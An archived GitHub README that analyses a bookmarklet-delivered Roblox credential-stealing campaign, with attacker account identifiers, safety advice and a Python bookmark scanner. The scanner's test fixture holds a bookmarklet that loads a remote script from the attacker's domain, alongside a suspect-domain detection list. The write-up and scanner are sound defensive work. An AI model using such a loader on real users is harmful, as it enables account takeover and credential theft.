This repository was archived by the owner on Aug 11, 2024. It is now read-only.

A detailed analysis of a sophisticated Roblox credential-stealing malware, focusing on its methods, features, and mitigation strategies.


JustOptimize/rolinked-malware-analysis


Important

The code in this repository is malicious and should not be used under any circumstances. This analysis is provided solely for educational purposes.

RoLinked/Vlk Games/Vik Games – Roblox Credential-Stealing Malware

Overview

A sophisticated piece of malware has been identified, targeting Roblox users and compromising their accounts through deceptive methods. This malware is delivered via a bookmarklet on the attacker's websites (rolinked[.]com, rolinked[.]co) and is specifically designed to steal users' credentials, including their two-factor authentication (2FA) codes. The code is highly obfuscated, making it difficult to detect or reverse-engineer, which allows it to operate stealthily.

How It Works

  • Initial Contact: The attack begins when users are tricked into visiting the attacker's website, where they are instructed to drag a bookmarklet to their bookmarks bar. When executed on the Roblox website, this bookmarklet injects the malicious code.

  • Malicious Injection: Once injected, the malware manipulates the Roblox interface, displaying fake prompts that convince users to provide sensitive information, including their 2FA codes.

  • Security Bypass and Account Takeover: The malware collects the 2FA code and other security details, such as parental control PINs. It then takes control of the user's account by:

    • Changing the date of birth to 2/2/2022, exploiting COPPA regulations to hinder account recovery.
    • Altering the registered email to the attacker’s email, thereby disabling password recovery options.
    • Previously, the malware also checked for Robux and purchased scam products, though this feature is currently inactive.

Attacker Information

Associated Emails:

Roblox Alt Account:

  • Username: @slimeBallBack7
  • ID: 6045232974
  • Creation Date: 5/19/2024

Discord Account:

  • Username: infiniteblox
  • ID: 934401513734950912

Protection Measures

To safeguard against this malware and similar threats:

  • Stay Vigilant: Be cautious when interacting with off-platform websites, especially those that ask you to execute code.
  • Avoid Suspicious Links: Do not click on links from untrusted or unknown sources.
  • Do Not Execute Unverified Code: Never run code from untrusted sources, whether it’s a bookmarklet or a script in the developer console.

By adhering to these safety practices, you can protect yourself from potential threats targeting your Roblox account and other online platforms.
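As an added defensive example (not code from this repository), the following script audits a Chromium-style Bookmarks file for `javascript:` bookmarklets, the delivery mechanism described above, and flags any whose decoded payload references one of the domains named in this analysis. The Bookmarks JSON it scans is a constructed sample, and the bookmarklet in it is a generic remote-script loader used only as a detection fixture, not the actual payload.

```python
import json
from urllib.parse import unquote

# Domains named in this analysis, kept defanged as in the write-up; they are
# normalised before matching.
SUSPECT_DOMAINS = ("rolinked[.]com", "rolinked[.]co")


def scan_bookmarks(bookmarks_json: str) -> list:
    """Walk a Chrome/Chromium-style Bookmarks file and flag javascript: bookmarklets.

    Each finding records the bookmark name, the first suspect domain referenced
    by the decoded payload (or None), and a short preview of the decoded code.
    """
    data = json.loads(bookmarks_json)
    findings = []

    def walk(node: dict) -> None:
        if node.get("type") == "url":
            url = node.get("url", "")
            if url.lower().startswith("javascript:"):
                # Bookmarklets are usually percent-encoded; decode before matching.
                code = unquote(url[len("javascript:"):])
                refs = [d for d in SUSPECT_DOMAINS
                        if d.replace("[.]", ".") in code.lower()]
                findings.append({
                    "name": node.get("name", ""),
                    "suspect_domain": refs[0] if refs else None,
                    "preview": code[:60],
                })
        for child in node.get("children", []):
            walk(child)

    for root in data.get("roots", {}).values():
        if isinstance(root, dict):
            walk(root)
    return findings


# Constructed sample Bookmarks file: one benign bookmark plus one javascript:
# bookmarklet that loads a remote script from a domain named in the analysis.
SAMPLE_BOOKMARKS = json.dumps({
    "roots": {
        "bookmark_bar": {"type": "folder", "children": [
            {"type": "url", "name": "Roblox", "url": "https://www.roblox.com/"},
            {"type": "url", "name": "Free Robux",
             "url": "javascript:(function()%7Bvar%20s%3Ddocument.createElement('script')%3B"
                    "s.src%3D'https%3A%2F%2Frolinked.com%2Fx.js'%3Bdocument.body.appendChild(s)%7D)()"},
        ]},
        "other": {"type": "folder", "children": []},
    }
})

if __name__ == "__main__":
    for finding in scan_bookmarks(SAMPLE_BOOKMARKS):
        print(finding)
```

Point it at a real profile's Bookmarks file (for example, Chrome's `Default/Bookmarks`) to check whether a bookmarklet of this kind is already installed.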
